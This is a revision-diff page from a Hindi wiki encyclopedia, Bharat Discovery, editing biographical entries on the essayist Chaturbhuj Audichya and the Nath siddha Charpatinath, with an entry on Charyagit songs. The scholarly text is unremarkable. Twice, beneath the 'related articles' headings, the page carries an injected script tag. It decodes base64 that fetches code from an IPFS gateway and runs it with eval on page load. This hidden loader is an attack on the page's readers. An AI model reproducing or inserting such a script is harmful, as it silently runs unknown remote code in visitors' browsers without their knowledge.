Difference between revisions of "प्रयोग:दीपिका"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
Line 14: Line 14:
 
|कर्म भूमि=
 
|कर्म भूमि=
 
|कर्म-क्षेत्र=
 
|कर्म-क्षेत्र=
|मुख्य रचनाएँ=औदीच्य जी का 'कवित्व' नामक निबन्ध बहुप्रशंसित है।
+
|मुख्य रचनाएँ='कवित्व' (निबन्ध)
 
|विषय=
 
|विषय=
 
|खोज=
 
|खोज=
Line 24: Line 24:
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय
 
|नागरिकता=भारतीय
|संबंधित लेख=[[द्विवेदी युग|द्विवेदी-युग]], [[साहित्य]], [[रामचन्द्र शुक्ल]], [[भाषा]]
+
|संबंधित लेख=[[द्विवेदी युग|द्विवेदी-युग]], [[साहित्य]], [[रामचन्द्र शुक्ल]]
 
|शीर्षक 1=रचना-काल
 
|शीर्षक 1=रचना-काल
 
|पाठ 1=[[1904]] ई.
 
|पाठ 1=[[1904]] ई.
Line 35: Line 35:
 
|शीर्षक 5=
 
|शीर्षक 5=
 
|पाठ 5=
 
|पाठ 5=
|अन्य जानकारी=ऐसा लगता है कि ये उन लेखकों में-से थे, जो [[साहित्य]] को जीवन का अनिवार्य अंग या व्यापार न बनाकर कभी-कभी लिखते हैं।  
+
|अन्य जानकारी=ऐसा लगता है कि ये उन लेखकों में से थे, जो [[साहित्य]] को जीवन का अनिवार्य अंग या व्यापार न बनाकर कभी-कभी लिखते हैं।  
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
  
'''चतुर्भुज औदीच्य''' [[द्विवेदी युग|द्विवेदी-युग]] के निबन्धकार थे। औदीच्य जी का 'कवित्व' नामक निबन्ध बहुप्रशंसित है। प्रथम अध्याय में कवित्व की प्रशंसा, द्वितीय में कवित्व का जन्म, तृतीय में कवीत्व का भाषा से [[विवाह]] तथा चतुर्थ में मिथ्या (कल्पना) का कवित्व से सम्बन्ध स्थापन किया गया है।  
+
'''चतुर्भुज औदीच्य''' [[द्विवेदी युग]] के निबन्धकार थे। औदीच्य जी का 'कवित्व' नामक निबन्ध बहुप्रशंसित है। इसे ही निबन्धों को ध्यान में रखकर [[रामचन्द्र शुक्ल]] ने [[कविता]] की [[भाषा]] का प्रयोग आलोचना के क्षेत्र में इन्हें अनुचित माना है।
 
=== परिचय ===  
 
=== परिचय ===  
चतुर्भुज औदीच्य का रचना-काल [[1904]] ई. है। यह [[द्विवेदी युग|द्विवेदी-युग]] के निबन्धकार थे। ऐसा लगता है कि ये उन लेखकों में-से थे, जो [[साहित्य]] को जीवन का अनिवार्य अंग या व्यापार न बनाकर कभी-कभी लिखते हैं। ऐसे लेखक गौण होते हुए भी [[साहित्य]] के लिए अपेक्षित वातावरण बनाने में सहायक होते हैं।
+
चतुर्भुज औदीच्य का रचना-काल [[1904]] ई. है। यह [[द्विवेदी युग|द्विवेदी-युग]] के निबन्धकार थे। ऐसा लगता है कि ये उन लेखकों में से थे, जो [[साहित्य]] को जीवन का अनिवार्य अंग या व्यापार न बनाकर कभी-कभी लिखते हैं। ऐसे लेखक गौण होते हुए भी साहित्य के लिए अपेक्षित वातावरण बनाने में सहायक होते हैं।
  
 
=== लेखन शैली ===
 
=== लेखन शैली ===
औदीच्य जी का 'कवित्व' नामक [[निबन्ध]] बहुप्रशंसित है। 'कवित्व' निबन्ध में भाव, उपादान और शैली सभी महत्त्वपूर्ण थे <ref>श्रीकृष्णलाल: 'आधुनिक हिन्दी साहित्य का विकास', पृ. 354</ref>। इस निबन्ध का मूलाधर बंगला के पंचानन तर्करत्न का 'कवित्व' शीर्षक निबन्ध है। यह रूप और शैली में खण्ड-काव्य के निकट पहुँचता है। यह चार अध्यायों में विभक्त है। प्रथम अध्याय में कवित्व की प्रशंसा, द्वितीय में कवित्व का जन्म, तृतीय में कवीत्व का [[भाषा]] से [[विवाह]] तथा चतुर्थ में मिथ्या <ref>कल्पना</ref>का कवित्व से सम्बन्ध स्थापन किया गया है। "इस प्रकार लेखक ने एक बहुत ही कवित्वपूर्ण रूपात्मक कहानी की सृष्टि की, जिसमें कवित्व,भाषा, मिथ्या और कल्पना का मानवीयकरण हुआ है।"  
+
औदीच्य जी का 'कवित्व' नामक [[निबन्ध]] बहुप्रशंसित है। 'कवित्व' निबन्ध में भाव, उपादान और शैली सभी महत्त्वपूर्ण थे <ref>श्रीकृष्णलाल: 'आधुनिक हिन्दी साहित्य का विकास', पृ. 354</ref>। इस निबन्ध का मूलाधर [[बंगला भाषा|बंगला]] के पंचानन तर्करत्न का 'कवित्व' शीर्षक निबन्ध है। यह रूप और [[शैली]] में [[खण्ड काव्य|खण्ड-काव्य]] के निकट पहुँचता है। यह चार अध्यायों में विभक्त है। प्रथम अध्याय में कवित्व की प्रशंसा, द्वितीय में कवित्व का जन्म, तृतीय में कवित्व की [[भाषा]] से [[विवाह]] तथा चतुर्थ में मिथ्या (कल्पना) का कवित्व से सम्बन्ध स्थापन किया गया है। "इस प्रकार लेखक ने एक बहुत ही कवित्वपूर्ण रूपात्मक कहानी की सृष्टि की, जिसमें कवित्व, भाषा, मिथ्या और कल्पना का मानवीयकरण हुआ है।"  
 
=== भाषा शैली ===
 
=== भाषा शैली ===
सम्भवत: ऐसी ही निबन्धों को ध्यान में रखकर [[रामचन्द्र शुक्ल]] ने कविता की [[भाषा]] का प्रयोग आलोचना के क्षेत्र में अनुचित माना है।<ref>'हिन्दी साहित्य का इतिहास', सप्तम संस्करण, पृ. 595-596</ref> वस्तुत: इस [[निबन्ध]] को आलोचना के क्षेत्र से अलग कर शुद्ध कलात्मक निबन्ध के अंतर्गत परिगणित करना चाहिए।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी साहित्य कोश भाग-2|लेखक=डॉ. धीरेन्द्र वर्मा|अनुवादक= |आलोचक= |प्रकाशक=ज्ञानमण्डल लिमिटेड, वाराणसी|संकलन=भारत डिस्कवरी पुस्तकालय|संपादन=|पृष्ठ संख्या=181|url=}}</ref>  
+
सम्भवत: ऐसे ही निबन्धों को ध्यान में रखकर [[रामचन्द्र शुक्ल]] ने [[कविता]] की [[भाषा]] का प्रयोग आलोचना के क्षेत्र में अनुचित माना है।<ref>'हिन्दी साहित्य का इतिहास', सप्तम संस्करण, पृ. 595-596</ref> वस्तुत: इस [[निबन्ध]] को आलोचना के क्षेत्र से अलग कर शुद्ध कलात्मक निबन्ध के अंतर्गत परिगणित करना चाहिए।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी साहित्य कोश भाग-2|लेखक=डॉ. धीरेन्द्र वर्मा|अनुवादक= |आलोचक= |प्रकाशक=ज्ञानमण्डल लिमिटेड, वाराणसी|संकलन=भारत डिस्कवरी पुस्तकालय|संपादन=|पृष्ठ संख्या=181|url=}}</ref>  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 100: Line 100:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''चर्पटीनाथ''' ने एक [[श्लोक]] में पारद का यशोगान किया गया है और इसी सन्दर्भ में स्वर्ण या स्वर्णभस्म बनाने की विधि का उल्लेख भी हुआ है। इसीलिए चर्पटीनाथ रसेश्वरसिद्ध कहे जाते हैं। चौरासी सिद्धों में से एक, जिन्हें राहुल सांकृत्यायन की सूची में 59 वाँ और 'वर्ण रत्नाकार' की सूची में 31 वाँ सिद्ध बताया गया है। रज्जब की सर्वागी इन्हें चारणी के गर्भ से उत्पन्न कहा गया है किंतु [[पीताम्बर दत्त बड़थ्वाल|डा. पीताम्बरदत्त बड़थ्वाल]] ने इनका नाम चम्ब रियासत की राजवंशावली में खोज निकाला है।  
+
'''चर्पटीनाथ''' चौरासी सिद्धों में से एक थे, जिन्हें [[राहुल सांकृत्यायन]] की सूची में 59वाँ और 'वर्ण रत्नाकार' की सूची में 31वाँ सिद्ध बताया गया है। एक [[श्लोक]] में पारद का यशोगान किया गया है और इसी सन्दर्भ में स्वर्ण या स्वर्णभस्म बनाने की विधि का उल्लेख भी हुआ है। इसीलिए चर्पटीनाथ रसेश्वरसिद्ध कहे जाते हैं।
 +
===जीवन परिचय ===
 +
राहुल जी ने चर्पटीनाथ जी को [[गोरखनाथ]] का शिष्य मानकर इनका समय 11 वीं शती अनुमित किया है। 'नाथ सिद्धों की बानियाँ' में इनकी सबदी संकलित है। उसमें एक स्थल पर कहा गया है-
 +
<blockquote>"आई भी छोड़िये, लैन न जाइये। कुहे गोरष कूता विचारि-विचारि षाइये।।"</blockquote>
  
=== परिचय ===
+
सबदी में कई स्थलों पर अवधूत या शब्द का भी प्रयोग हुआ है। एक सबदी में नागार्जुन को सम्बोधित किया गया है-
चर्पटीनाथ चौरासी सिद्धों में से एक, जिन्हें राहुल सांकृत्यायन की सूची में 59 वाँ और 'वर्ण रत्नाकार' की सूची में 31 वाँ सिद्ध बताया गया है। राहुल जी ने इन्हें [[गोरखनाथ]] का शिष्य मानकर इनका समय 11 वीं शती अनुमित किया है। 'नाथ सिद्धों की बानियाँ' में इनकी सबदी संकलित है। उसमें एक स्थल पर कहा गया है- "आई भी छोड़िये, लैन न जाइये। कुहे गोरष कूता विचारि-विचारि षाइये।।" सबदी में कई स्थलों पर अवधूत या शब्द का भी प्रयोग हुआ है। एक सबसी में नागार्जुन को सम्बोधित किया गया है- "कहै चर्पटी सोंण हो नागा अर्जुन।" इन उल्लेखों से विदित होता है कि चर्पटीनाथ गोरखनाथ के परवर्ती और नागार्जुन के समसामयिक सिद्ध थे, अत: अनुमान किया जा सकता है कि वे 11 वीं 12 वीं शताब्दी में हुए होंगे। रज्जब की सर्वागी इन्हे चारणी के गर्भ से उत्पन्न कहा गया है किंतु [[पीताम्बर दत्त बड़थ्वाल|डा. पीताम्बर दत्त बड़थ्वाल]] ने इनका नाम चम्ब रियासत की राजवंशावली में खोज निकाला है। एक सबदी में "सत-सत भाषंत श्री चरपटराव" कहकर कदाचित् चर्पटीनाथ ने स्वयं राजवंश से अपने सम्बन्ध का संकेत किया है।  
+
 
===लेखन शैली ===
+
<blockquote>"कहै चर्पटी सोंण हो नागा अर्जुन।"</blockquote>
 +
 
 +
इन उल्लेखों से विदित होता है कि चर्पटीनाथ [[गोरखनाथ]] के परवर्ती और नागार्जुन के समसामयिक सिद्ध थे, अत: अनुमान किया जा सकता है कि वे 11 वीं 12 वीं शताब्दी में हुए होंगे। रज्जब की सर्वागी इन्हे चारणी के गर्भ से उत्पन्न कहा गया है किंतु [[पीताम्बर दत्त बड़थ्वाल|डा. पीताम्बर दत्त बड़थ्वाल]] ने इनका नाम चम्ब रियासत की राजवंशावली में खोज निकाला है। एक सबदी में "सत-सत भाषंत श्री चरपटराव" कहकर कदाचित् चर्पटीनाथ ने स्वयं राजवंश से अपने सम्बन्ध का संकेत किया है।  
 +
===वर्ण विषय ===
 
चर्पटीनाथ की किसी स्वतंत्र रचना का प्रमाण नहीं मिला। [[हजारीप्रसाद द्विवेदी|डा. हजारीप्रसाद द्विवेदी]] ने उनकी एक तिब्बती भाषा में लिखी कृति 'चतुर्भवाभिशन' का उल्लेख किया है। 'नाथ सिद्धों की बानियाँ' में चर्पटीनाथ की 59 सवदियाँ और 5 श्लोक संकलित हैं। इनका वर्ण्य-विषय लौकिक पाखण्डों का खण्डन तथा कामिनी-कंचन की निन्दा आदि है। एक श्लोक में पारद का यशोगान किया गया है और इसी सन्दर्भ में स्वर्ण या स्वर्णभस्म बनाने की विधि का उल्लेख भी हुआ है। इसीलिए चर्पटीनाथ रसेश्वरसिद्ध कहे जाते हैं।<ref>[सहायक ग्रंथ-पुरातत्त्व निबन्धावली: महापण्डित राहिल सांकृत्यायन; हिन्दी काव्यधारा: महापण्डित राहुल सांस्कृत्यायन; नाथ सम्प्रदाय: डा. हजारी प्रसाद द्विवेदी; नाथ सिद्धों की बानियाँ: डा. हजारी प्रसाद द्विवेदी; योग प्रवाह: डा. पीताम्बरदत्त बड़थ्वाल।]</ref><ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी साहित्य कोश भाग-2|लेखक=डॉ. धीरेन्द्र वर्मा|अनुवादक= |आलोचक= |प्रकाशक=ज्ञानमण्डल लिमिटेड, वाराणसी|संकलन=भारत डिस्कवरी पुस्तकालय|संपादन=|पृष्ठ संख्या=183|url=}}</ref>
 
चर्पटीनाथ की किसी स्वतंत्र रचना का प्रमाण नहीं मिला। [[हजारीप्रसाद द्विवेदी|डा. हजारीप्रसाद द्विवेदी]] ने उनकी एक तिब्बती भाषा में लिखी कृति 'चतुर्भवाभिशन' का उल्लेख किया है। 'नाथ सिद्धों की बानियाँ' में चर्पटीनाथ की 59 सवदियाँ और 5 श्लोक संकलित हैं। इनका वर्ण्य-विषय लौकिक पाखण्डों का खण्डन तथा कामिनी-कंचन की निन्दा आदि है। एक श्लोक में पारद का यशोगान किया गया है और इसी सन्दर्भ में स्वर्ण या स्वर्णभस्म बनाने की विधि का उल्लेख भी हुआ है। इसीलिए चर्पटीनाथ रसेश्वरसिद्ध कहे जाते हैं।<ref>[सहायक ग्रंथ-पुरातत्त्व निबन्धावली: महापण्डित राहिल सांकृत्यायन; हिन्दी काव्यधारा: महापण्डित राहुल सांस्कृत्यायन; नाथ सम्प्रदाय: डा. हजारी प्रसाद द्विवेदी; नाथ सिद्धों की बानियाँ: डा. हजारी प्रसाद द्विवेदी; योग प्रवाह: डा. पीताम्बरदत्त बड़थ्वाल।]</ref><ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी साहित्य कोश भाग-2|लेखक=डॉ. धीरेन्द्र वर्मा|अनुवादक= |आलोचक= |प्रकाशक=ज्ञानमण्डल लिमिटेड, वाराणसी|संकलन=भारत डिस्कवरी पुस्तकालय|संपादन=|पृष्ठ संख्या=183|url=}}</ref>
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 10:42, 15 January 2017

dipika
poora nam chaturbhuj audichy
mukhy rachanaean 'kavitv' (nibandh)
prasiddhi lekhak, nibandhakar
nagarikata bharatiy
sanbandhit lekh dvivedi-yug, sahity, ramachandr shukl
rachana-kal 1904 ee.
any janakari aisa lagata hai ki ye un lekhakoan mean se the, jo sahity ko jivan ka anivary aang ya vyapar n banakar kabhi-kabhi likhate haian.

chaturbhuj audichy dvivedi yug ke nibandhakar the. audichy ji ka 'kavitv' namak nibandh bahuprashansit hai. ise hi nibandhoan ko dhyan mean rakhakar ramachandr shukl ne kavita ki bhasha ka prayog alochana ke kshetr mean inhean anuchit mana hai.

parichay

chaturbhuj audichy ka rachana-kal 1904 ee. hai. yah dvivedi-yug ke nibandhakar the. aisa lagata hai ki ye un lekhakoan mean se the, jo sahity ko jivan ka anivary aang ya vyapar n banakar kabhi-kabhi likhate haian. aise lekhak gaun hote hue bhi sahity ke lie apekshit vatavaran banane mean sahayak hote haian.

lekhan shaili

audichy ji ka 'kavitv' namak nibandh bahuprashansit hai. 'kavitv' nibandh mean bhav, upadan aur shaili sabhi mahattvapoorn the [1]. is nibandh ka mooladhar bangala ke panchanan tarkaratn ka 'kavitv' shirshak nibandh hai. yah roop aur shaili mean khand-kavy ke nikat pahuanchata hai. yah char adhyayoan mean vibhakt hai. pratham adhyay mean kavitv ki prashansa, dvitiy mean kavitv ka janm, tritiy mean kavitv ki bhasha se vivah tatha chaturth mean mithya (kalpana) ka kavitv se sambandh sthapan kiya gaya hai. "is prakar lekhak ne ek bahut hi kavitvapoorn roopatmak kahani ki srishti ki, jisamean kavitv, bhasha, mithya aur kalpana ka manaviyakaran hua hai."

bhasha shaili

sambhavat: aise hi nibandhoan ko dhyan mean rakhakar ramachandr shukl ne kavita ki bhasha ka prayog alochana ke kshetr mean anuchit mana hai.[2] vastut: is nibandh ko alochana ke kshetr se alag kar shuddh kalatmak nibandh ke aantargat pariganit karana chahie.[3]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. shrikrishnalal: 'adhunik hindi sahity ka vikas', pri. 354
  2. 'hindi sahity ka itihas', saptam sanskaran, pri. 595-596
  3. hindi sahity kosh bhag-2 |lekhak: d aau. dhirendr varma |prakashak: jnanamandal limited, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 181 |

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>




dipika
poora nam charpatinath
mukhy rachanaean da. hajariprasad dvivedi ne charpatinath ji ki ek tibbati bhasha mean likhi kriti 'chaturbhavabhishan' ka ullekh kiya hai.
bhasha tibbati bhasha,
prasiddhi lekhak
nagarikata bharatiy
sanbandhit lekh da. pitambar datt b dathval, da. hajariprasad dvivedi, gorakhanath
any janakari ek sabadi mean "sat-sat bhashant shri charapatarav" kahakar kadachith charpatinath ne svayan rajavansh se apane sambandh ka sanket kiya hai.

charpatinath chaurasi siddhoan mean se ek the, jinhean rahul saankrityayan ki soochi mean 59vaan aur 'varn ratnakar' ki soochi mean 31vaan siddh bataya gaya hai. ek shlok mean parad ka yashogan kiya gaya hai aur isi sandarbh mean svarn ya svarnabhasm banane ki vidhi ka ullekh bhi hua hai. isilie charpatinath raseshvarasiddh kahe jate haian.

jivan parichay

rahul ji ne charpatinath ji ko gorakhanath ka shishy manakar inaka samay 11 vian shati anumit kiya hai. 'nath siddhoan ki baniyaan' mean inaki sabadi sankalit hai. usamean ek sthal par kaha gaya hai-

"aee bhi chho diye, lain n jaiye. kuhe gorash koota vichari-vichari shaiye.."

sabadi mean kee sthaloan par avadhoot ya shabd ka bhi prayog hua hai. ek sabadi mean nagarjun ko sambodhit kiya gaya hai-

"kahai charpati soann ho naga arjun."

in ullekhoan se vidit hota hai ki charpatinath gorakhanath ke paravarti aur nagarjun ke samasamayik siddh the, at: anuman kiya ja sakata hai ki ve 11 vian 12 vian shatabdi mean hue hoange. rajjab ki sarvagi inhe charani ke garbh se utpann kaha gaya hai kiantu da. pitambar datt b dathval ne inaka nam chamb riyasat ki rajavanshavali mean khoj nikala hai. ek sabadi mean "sat-sat bhashant shri charapatarav" kahakar kadachith charpatinath ne svayan rajavansh se apane sambandh ka sanket kiya hai.

varn vishay

charpatinath ki kisi svatantr rachana ka praman nahian mila. da. hajariprasad dvivedi ne unaki ek tibbati bhasha mean likhi kriti 'chaturbhavabhishan' ka ullekh kiya hai. 'nath siddhoan ki baniyaan' mean charpatinath ki 59 savadiyaan aur 5 shlok sankalit haian. inaka varny-vishay laukik pakhandoan ka khandan tatha kamini-kanchan ki ninda adi hai. ek shlok mean parad ka yashogan kiya gaya hai aur isi sandarbh mean svarn ya svarnabhasm banane ki vidhi ka ullekh bhi hua hai. isilie charpatinath raseshvarasiddh kahe jate haian.[1][2]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. [sahayak granth-puratattv nibandhavali: mahapandit rahil saankrityayan; hindi kavyadhara: mahapandit rahul saanskrityayan; nath sampraday: da. hajari prasad dvivedi; nath siddhoan ki baniyaan: da. hajari prasad dvivedi; yog pravah: da. pitambaradatt b dathval.]
  2. hindi sahity kosh bhag-2 |lekhak: d aau. dhirendr varma |prakashak: jnanamandal limited, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 183 |

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>



charyagit bauddh sahity mean charya ka arth charit ya dainandin karyakram ka vyavaharik roop hai. buddhacharya, jisaka varnan rahul saankrityayan ne apane isi nam ke granth mean kiya hai, bauddhoan ki charya ka adarsh ban gayi aur usi ka prayog dainandin karyakram mean bodhichitt ke lie hone laga. gitishaili tatha pratikatmak bhasha ke prayog ki drishti se charyagit hindi ke sant kaviyoan ki rachana ki prishthabhoomi ka sundar parichay dete haian.

parichay

charyagit siddh aur nath parampara mean sangit ka prabhav badhane par jab gayan ka prayog sadhana ki abhivyakti ke lie hone laga to bodhichitt arthat chitt ki jagrat avastha ke ganoan ko 'charyagit' ki sanjna di gayi charyagit siddhoan ke ve git pad haian, jinamean siddhoan ki man:sthiti pratikoan dvara vyakt ki gayi hai. bauddh sahity mean charya ka arth charit ya dainandin karyakram ka vyavaharik roop hai.

granth mean varnan

buddhacharya, jisaka varnan rahul saankrityayan ne apane isi nam ke granth mean kiya hai, bauddhoan ki charya ka adarsh ban gayi aur usi ka prayog dainandin karyakram mean bodhichitt ke lie hone laga. inamean yoginiyoan ke sammilan, sadhak ki manasik avasthaoan mean kramash: rag aur anand ke prasphutan tatha bodhichitt ki vibhinn sthitiyoan ke saras varnan kiye gaye haian. inamean pray: shrriangar, vibhats aur utsah ki marmik vyanjanaean milati haian. alamban ke roop mean mukhyat: svayan sadhak ata hai. nayikaoan mean pray: nimn kul se sambandhit domani, chandali, shabari adi milati haian.

lekhan shaili

charyagit ke shaili mean sanghabhasha ka prayog hua hai. at: in gitoan mean prayukt nayikaoan ka pratikatmak arth hi nikala ja sakata hai. kapalik sadhan ke vividh upakaranoan tatha yogasadhana, tantrachar adi ka chamatkarapoorn varnan bhi in gitoan mean prapt hota hai. inamean gitikavy ke anek tattv dekhe ja sakate haian. kadachit siddhoan ne janasadharan ko akrisht karane ke lie hi giti-shaili ka prayog kiya hai. gitishaili tatha pratikatmak bhasha ke prayog ki drishti se charyagit hindi ke sant kaviyoan ki rachana ki prishthabhoomi ka sundar parichay dete haian. santoan ki ulatavasiyaan charyagitoan ki sanghabhasha ki hi parampata mean ati haian. in gitoan mean anek rag-raginiyoan ka prayog hua hai. vinapa adi ki rekhakritiyoan tatha gopichandr dvara nirmit gopiyantr (sarangi) adi se pramanik hota hai ki in gitoan ka prayog vibhinn rag-raginoyoan ke anusar gakar kiya jata tha. sarahapa ke vishay mean prasiddh hai ki ve kee ragoan ke janmadata the. mahamahopadhyay pandit haraprasad shastri ne charyagitoan ke 18 ragoan ka ullekh kiya hai. gitoan mean prayukt chhandoan ke sambandh mean da. suniti kumar chatarji ne yah siddh karane ka prayatn kiya hai ki unamean payar chhand ka prayog hua hai. payar chand vastav mean sanskrit ka padakulak chhand hi hai.

bhasha shaili

par nahian samajhana chahie ki siddhoan ka sampoorn giti-sahity charyagit hi hai. unake sadhana sambandhi git 'vajragit' ke ek bhinn nam se abhihit haian. siddhoan ne vajragit aur charyagiy ki bhinnata ka barabar sanket kiya hai. charyagit ki bhasha adhunik ary bhashaoan ke poorv ki apabhransh bhasha hai parantu hindi ke sant-sahity ki bhasha, chhand-vidhan, shaili, pratik, ragatattv adi ke adhyayan ke lie in gitoan ka parichay avashyak hai.[1][2]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. [sahayak granth-puratattv nibandhavali: mahapandit rahul saankrityayan: hindikavy dhara: mahapandit rahul saankrityayan; nath sampraday: da. hajariprasad dvivedi; nath siddhoan ki baniyaan: da. hajariprasad dvivedi; yog pravah: da. pitambadatt b dathval]
  2. (hindi sahity kosh, bhag 2, pri.san,183)

bahari k diyaan

sanbandhit lekh